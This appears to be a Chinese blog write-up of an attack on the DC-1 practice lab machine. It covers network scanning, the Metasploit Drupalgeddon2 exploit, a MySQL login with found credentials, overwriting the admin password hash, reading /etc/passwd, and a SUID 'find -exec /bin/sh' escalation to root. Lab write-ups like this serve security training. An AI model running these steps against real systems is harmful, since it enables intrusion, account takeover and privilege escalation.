dc-1靶机渗透记录

1.在kali中输入ifconfig查看网段
在这里插入图片描述
Ip为:192.168.126.129
网段:192.168.126.0

2.使用nmap扫描网段:

nmap -sP 192.168.126.0/24

在这里插入图片描述
对该地址扫描
在这里插入图片描述

nmap -sV 192.168.126.133

在这里插入图片描述
发现80端口开放;

3.根据ip地址访问游览器
在这里插入图片描述
由左下角知该网页基于Drupal, 并且为drupal7
启动Metersploit:msfconsole
在这里插入图片描述

用search 命令查找与Drupal 有关的漏洞:search Drupal
在这里插入图片描述
选取2018的进行测试,因为有远程代码执行漏洞:

use exploit/unix/webapp/drupal_drupalgeddon2
Set RHOSTS 192.168.126.133
Run

在这里插入图片描述
列出文件列表,发现flag1.txt文件:
在这里插入图片描述
查看flag1.txt

Cat flag1.txt

在这里插入图片描述
4.百度搜索Drupal默认的文件路径:
在这里插入图片描述

cd sites
cd /default
cd default
ls

在这里插入图片描述
5.需要用到反弹shell

python -c 'import pty; pty.spawn("/bin/bash")'
mysql -udbuser -pR0ck3t

在这里插入图片描述

show databases;

在这里插入图片描述

use drupaldb
show tables;

在这里插入图片描述

select * from users;

在这里插入图片描述
由于密码为hash值,无法破解,因此选择将密码进行更改:

quit
cd /var/www
php scripts/password-hash.sh 123

在这里插入图片描述

update users set pass="$S$DHFOxgrwZAQ1QCjgXzM2XlqoNxKKLOqs2hK23.N9lNZV.OLuCIL2" where uid=1;

在这里插入图片描述

6.使用firefox登录网站;
进入网页登录,登陆后点击dashboard, 发现flag3
在这里插入图片描述
在这里插入图片描述
7.cat /etc/passwd
在这里插入图片描述

cat /home/flag4
cd /home/flag4
ls

查看flag4文件后发现需要进行提权操作
在这里插入图片描述

find / -perm -u=s -type f2>/dev/null 
find / -user root -perm -4000 -print 2>/dev/null

在这里插入图片描述

find / -name flag4.txt -exec "/bin/sh" \;
whoami
cd /root
ls
cat thefinalflag.txt

在这里插入图片描述

  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值